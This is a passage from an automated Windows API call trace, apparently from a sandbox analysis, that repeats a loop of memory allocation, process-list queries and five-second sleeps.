BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.250] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.257] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.264] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.267] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.273] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.280] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.289] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.297] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.305] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.312] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.321] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.330] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.333] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.347] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.355] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.362] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.370] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.378] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.386] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.395] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.402] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.409] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.416] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, 